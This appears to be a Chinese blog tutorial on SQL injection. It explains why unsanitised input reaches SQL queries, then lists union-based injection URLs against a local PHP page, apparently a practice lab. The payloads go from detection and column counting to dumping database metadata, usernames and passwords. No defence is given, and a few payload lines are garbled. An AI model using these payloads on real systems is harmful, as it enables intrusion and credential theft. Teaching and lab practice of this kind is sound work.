## 前言
今天来分享一些网站搭建中经常出现的漏洞解析,我们在
网站搭建中经常会遇到一些网站报错的小问题,不要小看这些
小问题,有可能会直接使我们的程序崩溃,造成不可逆的损失
数据损坏。而有一些不法分子会利用我们网站的漏洞进行攻击
与数据盗取,希望大家注意,今天就分享一下自己对网站搭建
与安全的一些见解。
SQL注入漏洞主要形成的原因是在数据交互中,前端的
数据传入到后台处理时,没有做严格的判断,导致其传入的
“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。
从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
PHP代码:$sql="SELECT user_name FROM users WHERE id='$id' LIMIT 0,1";
地址:http://127.0.0.1/index.php?id=1
此时的数据库语句:
select user_name from users where id=‘1’
1、 判断注入
http://127.0.0.1/index.php?id=1 and 1=1 //页面反馈正常
http://127.0.0.1/index.php?id=1 and 1=2 //页面显示报错
2、 判断字段数
http://127.0.0.1/index.php?id=1 order by 1
http://127.0.0.1/index.php?id=1 order by 2
http://127.0.0.1/index.php?id=1 order by 3
http://127.0.0.1/index.php?id=1 order by 4 //页面进行报错,存在三个字段数
3、 查库
http://127.0.0.1/index.php?id=-1 union select 1,2,3
http://127.0.0.1/index.php?id=-1 union select 1,2,database() //库名
数据库版本:version()
数据库名字:database()
数据库用户:user()
操作系统:@@version_compile_os.
http://127.0.0.1/index.php?id=-1 union select
1,2,group_concat(table_name) from information_sch
ema.tables where table_schema=database()
http://127.0.0.1/index.php?id=-1 union select
1,2,group_concat(column_name) from information_sche
ma.columns where table_name='users'
http://127.0.0.1/Less-2/?id=-1 union select
1,2,group_concat(username) from security.users
http://127.0.0.1/index.php?id=-1?id=-1 union
select 1,2,group_concat(password) from security.users